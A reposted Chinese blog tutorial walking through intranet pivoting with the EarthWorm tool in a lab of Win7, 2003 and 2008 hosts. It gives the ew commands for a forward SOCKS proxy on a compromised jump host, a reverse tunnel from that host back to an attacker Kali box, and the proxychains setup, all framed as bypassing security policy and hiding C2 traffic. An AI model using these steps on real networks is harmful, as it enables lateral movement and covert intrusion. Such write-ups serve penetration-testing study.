内网穿透之EarthWorm

admin 2022年4月18日04:07:08评论70 views字数 995阅读3分19秒阅读模式

何必择地?何必择时?但问立志之真不真尔?

一个资质平庸却努力上进的普通人,我希望,当我回首往事时,不因虚度年华而悔恨,也不因碌碌无为而羞愧,我可以对自己说:我,不负此生。

0x00 前言

构建内网隐蔽通道,从而突破各种安全策略限制,实现对目标服务器的完美控制。
当我们从外网成功获得攻击点的时候,通过反弹shell、端口转发、内网穿透等技巧,来进一步入侵内网服务器。当我们取得内网目标服务器的控制权限,通过隧道技术绕过网络限制,实现隐蔽C2服务器的通信。
网络拓扑:
内网穿透之EarthWorm
网络配置IP如下:
攻击机:
win10:192.168.1.6
kali:192.168.1.7

靶场:
VM1:对外边界服务器,win7
192.168.52.143
192.168.1.5

VM2:域成员,2003
192.168.52.141

VM3:域控,2008
192.168.52.138

0x01 ew

1.1 攻击机为kali环境
 ew正向代理
1.正向连接跳板机在win7机器上执行(ew_for_windows上传到跳板机)
ew_for_win_32.exe -s ssocksd -l 1090
内网穿透之EarthWorm
这里还需要修改proxychains.conf配置文件
$ vim /etc/proxychains.conf
socks5  192.168.1.5 1090

内网穿透之EarthWorm
测试执行:
proxychains curl http://192.168.52.143/
内网穿透之EarthWorm
ew反向代理
服务端-攻击机kali
执行:
./ew_for_linux -s rcsocks -l 1080 -e 1024
内网穿透之EarthWorm
客户端-跳板机
执行
ew.exe -s rssocks -d 192.168.1.7 -e 1024
内网穿透之EarthWorm
配置proxychains代理链
在配置文件/etc/proxychains.conf,
将代理设置成本机的1080端口(root用户修改):
内网穿透之EarthWorm
测试执行:
proxychains curl http://192.168.52.143/
内网穿透之EarthWorm
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:进德修业行道 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(进德修业行道):内网穿透之EarthWorm

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月18日04:07:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网穿透之EarthWormhttp://cn-sec.com/archives/584354.html

发表评论

匿名网友 填写信息